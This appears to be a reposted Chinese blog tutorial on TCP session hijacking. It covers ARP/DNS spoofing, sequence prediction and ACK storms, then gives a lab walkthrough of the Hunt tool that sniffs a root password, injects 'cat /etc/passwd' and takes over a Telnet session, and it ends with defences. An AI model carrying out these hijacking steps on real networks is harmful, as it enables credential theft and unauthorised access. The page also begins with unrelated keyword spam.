汉川市城乡建设局网站,企业制作宣传片,2021年世界500强榜单,网站移动端指的是什么前言通常#xff0c;大家所说的hack#xff0c;都是针对一台主机#xff0c;在获得管理员权限后#xff0c;就很是得意#xff1b;其实#xff0c;真正的hacker是占领整个内部网络。针对内部网络的hack方法比较多#xff0c;但比较有效的方法非ARP欺骗、DNS欺骗莫属了。… 前言 通常大家所说的hack都是针对一台主机在获得管理员权限后就很是得意其实真正的hacker是占领整个内部网络。针对内部网络的hack方法比较多但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是不管使用什么技术无非都是抓取目标的数据包然后分析出敏感数据。如果目标内部采用的是共享式网络采用HUB集线器连网那只需要把网卡设置为“混杂模式”挂上嗅探器Sniffer就能简听到你想得到的数据。如果是交换式网络采用交换机连网这样方法就行不通了因为对于嗅探器有三种网络环境是无法跨越的“网桥”、“交换机”、“路由器”。可惜对于ARP欺骗交换式网络还是无能为力如果我们借助ARP欺骗在实现更高一层的“***手段”从而真正的控制内部网络。这也就是本文要叙述的会话劫持***…… 一、会话劫持原理 1、什么是会话劫持 在现实生活中比如你去市场买菜在交完钱后你要求先去干一些别的事情稍候再来拿菜如果这个时候某个陌生人要求把菜拿走卖菜的人会把菜给陌生人吗当然这只是一个比喻但这恰恰就是会话劫持的喻意。所谓会话就是两台主机之间的一次通讯。例如你Telnet到某台主机这就是一次Telnet会话你浏览某个网站这就是一次HTTP会话。而会话劫持Session Hijack就是结合了嗅探以及欺骗技术在内的***手段。例如在一次正常的会话过程当中***者作为第三方参与到其中他可以在正常数据包中插入恶意数据也可以在双方的会话当中进行简听甚至可以是代替某一方主机接管会话。我们可以把会话劫持***分为两种类型1中间人***(Man In The Middle简称MITM)2注射式***Injection并且还可以把会话劫持***分为两种形式1被动劫持2主动劫持被动劫持实际上就是在后台监视双方会话的数据流丛中获得敏感数据而主动劫持则是将会话当中的某一台主机“踢”下线然后由***者取代并接管会话这种***方法危害非常大***者可以做很多事情比如“cat etc/master.passwd”FreeBSD下的Shadow文件。 MITM***简介 这也就是我们常说的“中间人***”在网上讨论比较多的就是SMB会话劫持这也是一个典型的中间人***。要想正确的实施中间人******者首先需要使用ARP欺骗或DNS欺骗将会话双方的通讯流暗中改变而这种改变对于会话双方来说是完全透明的。关于ARP欺骗***防线介绍的比较多网上的资料也比较多我就不在多说了我只简单谈谈DNS欺骗。DNSDomain Name System即域名服务器我们几乎天天都要用到。对于正常的DNS请求例如在浏览器输入然后系统先查看Hosts文件如果有相对应的IP就使用这个IP地址访问网站其实利用Hosts文件就可以实现DNS欺骗如果没有才去请求DNS服务器DNS服务器在接收到请求之后解析出其对应的IP地址返回给我本地最后你就可以登陆到***防线的网站。而DNS欺骗则是目标将其DNS请求发送到***者这里然后***者伪造DNS响应将正确的IP地址替换为其他IP之后你就登陆了这个***者指定的IP而***者早就在这个IP中安排好了恶意网页可你却在不知不觉中已经被***者下了“套”……DNS欺骗也可以在广域网中进行比较常见的有“Web服务器重定向”、“邮件服务器重定向”等等。但不管是ARP欺骗还是DNS欺骗中间人***都改变正常的通讯流它就相当于会话双方之间的一个透明代理可以得到一切想知道的信息甚至是利用一些有缺陷的加密协议来实现。 注射式***简介 这种方式的会话劫持比中间人***实现起来简单一些它不会改变会话双方的通讯流而是在双方正常的通讯流插入恶意数据。在注射式***中需要实现两种技术1IP欺骗2预测TCP序列号。如果是UDP协议只需伪造IP地址然后发送过去就可以了因为UDP没有所谓的TCP三次握手但基于UDP的应用协议有流控机制所以也要做一些额外的工作。对于IP欺骗有两种情况需要用到1隐藏自己的IP地址2利用两台机器之间的信任关系实施***。在Unix/Linux平台上可以直接使用Socket构造IP包在IP头中填上虚假的IP地址但需要root权限在Windows平台上不能使用Winsock需要使用Winpacp也可以使用Libnet。例如在Linux系统首先打开一个Raw Socket原始套接字然后自己编写IP头及其他数据。可以参考下面的实例代码sockfd socket(AF_INET, SOCK_RAW, 255)setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, on, sizeof(on))struct ip *ipstruct tcphdr *tcpstruct pseudohdr pseudoheaderip-ip_src.s_addr xxxpseudoheader.saddr.s_addr ip-ip_src.s_addrtcp-check tcpchksum((u_short *)pseudoheader,12sizeof(struct tcphdr)) sendto(sockfd, buf, len, 0, (const sockaddr *)addr, sizeof(struct sockaddr_in)) 对于基于TCP协议的注射式会话劫持***者应先采用嗅探技术对目标进行简听然后从简听到的信息中构造出正确的序列号如果不这样你就必须先猜测目标的ISN初始序列号这样无形中对会话劫持加大了难度。那为什么要猜测会话双方的序列号呢请继续往下看。 2、TCP会话劫持 本文主要叙述基于TCP协议的会话劫持。如果劫持一些不可靠的协议那将轻而易举因为它们没有提供一些认证措施而TCP协议被欲为是可靠的传输协议所以要重点讨论它。 根据TCP/IP中的规定使用TCP协议进行通讯需要提供两段序列号TCP协议使用这两段序列号确保连接同步以及安全通讯系统的TCP/IP协议栈依据时间或线性的产生这些值。在通讯过程中双方的序列号是相互依赖的这也就是为什么称TCP协议是可靠的传输协议具体可参见RFC 793。如果***者在这个时候进行会话劫持结果肯定是失败因为会话双方“不认识”***者***者不能提供合法的序列号所以会话劫持的关键是预测正确的序列号***者可以采取嗅探技术获得这些信息。 TCP协议的序列号 现在来讨论一下有关TCP协议的序列号的相关问题。在每一个数据包中都有两段序列号它们分别为SEQ当前数据包中的第一个字节的序号ACK期望收到对方数据包中第一个字节的序号 假设双方现在需要进行一次连接S_SEQ将要发送的下一个字节的序号S_ACK将要接收的下一个字节的序号S_WIND接收窗口//以上为服务器ServerC_SEQ将要发送的下一个字节的序号C_ACK将要接收的下一个字节的序号C_WIND接收窗口//以上为客户端Client它们之间必须符合下面的逻辑关系否则该数据包会被丢弃并且返回一个ACK包包含期望的序列号。C_ACK C_SEQ C_ACK C_WINDS_ACK S_SEQ S_ACK S_WIND 如果不符合上边的逻辑关系就会引申出一个“致命弱点”具体请接着往下看。 致命弱点 这个致命的弱点就是ACK风暴(Storm)。当会话双方接收到一个不期望的数据包后就会用自己期望的序列号返回ACK包而在另一端这个数据包也不是所期望的就会再次以自己期望的序列号返回ACK包……于是就这样来回往返形成了恶性循环最终导致ACK风暴。比较好的解决办法是先进行ARP欺骗使双方的数据包“正常”的发送到***者这里然后设置包转发最后就可以进行会话劫持了而且不必担心会有ACK风暴出现。当然并不是所有系统都会出现ACK风暴。比如Linux系统的TCP/IP协议栈就与RFC中的描述略有不同。注意ACK风暴仅存在于注射式会话劫持。 TCP会话劫持过程 假设现在主机A和主机B进行一次TCP会话C为***者劫持过程如下A向B发送一个数据包SEQ (hex): X ACK (hex): YFLAGS: -AP--- Window: ZZZZ包大小为:60B回应A一个数据包SEQ (hex): Y ACK (hex): X60FLAGS: -AP--- Window: ZZZZ包大小为:50A向B回应一个数据包SEQ (hex): X60 ACK (hex): Y50FLAGS: -AP--- Window: ZZZZ包大小为:40B向A回应一个数据包SEQ (hex): Y50 ACK (hex): X100FLAGS: -AP--- Window: ZZZZ包大小为:30***者C冒充主机A给主机B发送一个数据包SEQ (hex): X100 ACK (hex): Y80FLAGS: -AP--- Window: ZZZZ包大小为:20B向A回应一个数据包SEQ (hex): Y80 ACK (hex): X120FLAGS: -AP--- Window: ZZZZ包大小为:10 现在主机B执行了***者C冒充主机A发送过来的命令并且返回给主机A一个数据包但是主机A并不能识别主机B发送过来的数据包所以主机A会以期望的序列号返回给主机B一个数据包随即形成ACK风暴。如果成功的解决了ACK风暴例如前边提到的ARP欺骗就可以成功进行会话劫持了。 关于理论知识就说到这里下面我以具体的实例演示一次会话劫持。 二、会话劫持实践 1、唠叨几句 可以进行会话劫持的工具很多比较常用有Juggernaut它可以进行TCP会话劫持的网络Sniffer程序TTY Watcher而它是针对单一主机上的连接进行会话劫持。还有如Dsniff这样的工具包也可以实现会话劫持只是看你会不会使用了。但能将会话劫持发挥得淋漓尽致的还要算Hunt这个工具了。它的作者是Pavel Krauz可以工作在Linux和一些Unix平台下。它的功能非常强大首先无论是在共享式网络还是交换式网络它都可以正常工作其次可以进行中间人***和注射式***。还可以进行嗅探、查看会话、监视会话、重置会话。通过前面的叙述我们知道在注射式***中容易出现ACK风暴解决办法是先进行ARP欺骗而使用Hunt进行注射式***时它并不进行ARP欺骗而是在会话劫持之后向会话双方发送带RST标志位的TCP包以中断会话避免ACK风暴继续下去。而中间人***是先进行ARP欺骗然后进行会话劫持。Hunt目前最新版本是1.5可以到Pavel Krauz网站下载源代码包和二进制文件~kra/#hunt。 现在来看看如果使用Hunt首先是下载并编译源代码[rootdahubaobao hunt]#wget[rootdahubaobao hunt]#tar zxvf hunt-1.5.tgz[rootdahubaobao hunt]#cd hunt-1.5[rootdahubaobao hunt-1.5]#make[rootdahubaobao hunt-1.5]#./hunt//Hunt是完全交互试的操作解释一下各个选项的含义l/w/r) list/watch/reset connections//l字母l为查看当前网络上的会话w为监视当前网络上的某个会话r为重置当前网络上的某个会话。a) arp/simple hijack (avoids ack storm if arp used)//中间人***会话劫持Hunt先进行ARP欺骗然后进行会话劫持。使用此方法可以避免出现ACK风暴。s) simple hijack//简单的会话劫持也就是注射式***。会出现ACK风暴。d) daemons rst/arp/sniff/mac//该选项共实现四个功能分别为终止会话自动发送带RST标志位的TCP包ARP欺骗后进行数据包转发不用说了嗅探功能在当前网络上收集MAC地址。其他的选项很简单不在多说了。还是来看看具体的例子吧我想大家都等不及了^_^ 2、应用实例 测试环境 ***者Red Hat Linux 9.0 IP192.168.0.10 主机AWindows Advanced Server IP192.168.0.1 主机BFreeBSD 4.9 STABLE IP192.168.0.20[rootdahubaobao hunt-1.5]#./hunt/** hunt 1.5* multipurpose connection intruder / sniffer for Linux* (c) 1998-2000 by kra*/starting hunt--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit* l //查看当前网络上的会话0192.168.0.1 [3465] ?192.168.0.20 [23]//主机A正在Telnet到主机B--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit* w //监视当前网络上的会话0192.168.0.1 [3465] ?192.168.0.20 [23]Choose conn0 //选择打算监视的会话。由于我的条件有限不能模拟多个会话请多见量。Dump [s]rc/[d]st/[b]oth [b] //回车Print sec/dst same charactes y/n [n] //回车 现在就可以监视会话了。主机A输入的一切内容我们都可以看到。主机A在Telnet并登陆之后直接su rootpassword后边的就是root的密码。现在这个系统已经完全由你所控制了自由发挥吧--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit* s //进行注射式会话劫持0192.168.0.1 [3465] ?192.168.0.20 [23]choose conn 0dump connection y/n [n]Enter the command string you wish executed or [cr] cat /etc/passwd***者的意图是获取主机B的passwd文件的内容但由于注射式会话劫持缺陷导致了ACK风暴所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit* a //进行中间人会话劫持0192.168.0.1 [3862] ?192.168.0.20 [23]choose conn 0arp spoof src in dst y/n [y]src MAC [XX:XX:XX:XX:XX:XX]arp spoof dst in src y/n [y]dst MAC [XX:XX:XX:XX:XX:XX]input mode [r]aw, [l]ineecho\r, line[e]cho [r]dump connectin y/n [y] npress key to take voer of connectionARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FAILEDdo you want to force arp spoof nutil successed y/n [y]CTRL-C to breakCTRLC //手工输入CTRLC中断不需等待-- operation canceled - press any keyARP spoof failedARP spoof of 192.168.0.20 in host 192.168.0.1 FAILEDyou took over the connectionCTRL-] to break-bash-2.05b$id.................... 现在***者已经成功的劫持了主机A和B之间的Telnet会话。主机A输入的一切命令***者都可以看到并且***者也可以自行插入命令。正如前边所说的这种会话劫持方式先进行ARP欺骗然后才劫持所以ACK风暴是不会出现的而且这种方式要比注射式会话劫持危害更大从上文中我想就能看出来我就不必在多说什么了。还有一些如Sniffer等功能都很简单由于已不在本文范畴故不在多说。 三、会话劫持防范 防范会话劫持是一个比较大的工程。首先应该使用交换式网络替代共享式网络虽然像Hunt这样的工具可以在交换环境中实现会话劫持但还是应该使用交换式网络替代共享式网络因为这样可以防范最基本的嗅探***。然而最根本的解决办法是采用加密通讯使用SSH代替Telnet、使用SSL代替HTTP或者干脆使用IPSec/×××这样会话劫持就无用武之地了。其次监视网络流量如发现网络中出现大量的ACK包则有可能已被进行了会话劫持***。 还有一点是比较重要的就是防范ARP欺骗。实现中间人***的前提是ARP欺骗如能阻止***者进行ARP欺骗中间人***还怎样进行如何防范ARP欺骗***防线有过详细的介绍可以参考2003年第9期杂志。 总结 对于***内部网络会话劫持确实是一种比较有效的方法我们应该掌握。本文的实践性很强请大家务必动手试试并希望能掌握此技术。Hunt这个强悍的工具使用方法很简单但却可以把会话劫持发挥淋漓尽致真佩服作者的编程功底 转载于:https://blog.51cto.com/hashlinux/2350637
